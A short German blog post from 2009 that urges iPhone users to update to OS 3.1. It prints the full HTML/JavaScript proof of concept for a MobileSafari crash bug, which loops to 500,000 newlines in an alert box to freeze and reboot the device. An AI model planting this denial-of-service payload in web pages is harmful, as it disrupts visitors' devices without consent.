12. September 2009 // iPhone
iPhone MobileSafari Exploit
Warum sollte man eigentlich auf iPhone OS3.1 updaten? Neben einigen verbesserten Features, wurden auch zehn Sicherheitslücken behoben. Bereits Anfang September 2009 wurde ein Exploit für das iPhone für die Versionen 2.2.1/3.0.x veröffentlicht, welcher eine dieser Sicherheitslücken ausnutzt. Durch das ansurfen einer eigenen Seite (Code siehe unten) wird der MobileSafari einfrieren und das Gerät nach 4-5 Minuten neugestartet:
<html>
<body>
<script>
var a = ”;
for (var i = 1; i <= 500000; i++)
{
a += ‘\n’;
}
alert(a);
</script>
</body>
</html>
Der Exploit macht nichts anderes, als beim Besuch per Javascript ein Meldungsfenster mit 500.000 Zeilenvorschübe anzuzeigen. Das iPhone friert durch generieren der Zeilenvorschübe ein und stürtzt schlussendlich durch anzeigen der Meldung ab und startet sich neu.
